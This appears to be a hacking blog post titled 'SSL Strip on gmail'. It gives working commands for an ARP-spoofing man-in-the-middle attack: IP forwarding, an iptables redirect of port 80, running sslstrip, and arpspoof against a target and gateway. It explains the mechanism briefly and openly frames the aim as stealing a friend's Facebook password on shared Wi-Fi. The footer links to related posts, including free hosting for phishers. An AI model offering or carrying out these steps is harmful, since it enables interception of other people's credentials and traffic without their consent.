SSL Strip on gmail



What is SSL Strip?

SSL strip is a software that is used to sniff the data over HTTP and HTTPS. The sniffer read all the data in a network with is send between a user and the Router but no a days SSH or "HTTPS" have made it very difficult to get useful data (Like Facebook Password of your friend in same wifi network). So here is a tools that can even intercept the data over HTTP and HTTPS.


Running sslstrip

  • Flip your machine into forwarding mode. (echo "1" > /proc/sys/net/ipv4/ip_forward)
  • Setup iptables to redirect HTTP traffic to sslstrip. (iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>)
  • Run sslstrip. (sslstrip.py -l <listenPort>)
  • Run arpspoof to convince a network they should send their traffic to you. (arpspoof -i <interface> -t <targetIP> <gatewayIP>)
That should do it.

How do this work?

First, arpspoof convinces a host that our MAC address is the router’s MAC address, and the target begins to send us all its network traffic. The kernel forwards everything along except for traffic destined to port 80, which it redirects to $listenPort (10000, for example).
At this point, sslstrip receives the traffic and does its magic.

                                          Video tutorials 






Comments

Popular posts from this blog

HOW TO TRACE MOBILE NUMBER , IP ADDRESS , BULK SMS SENDER , LANDLINE NUMBER ???

FREE HOSTING SITES FOR PHISHERS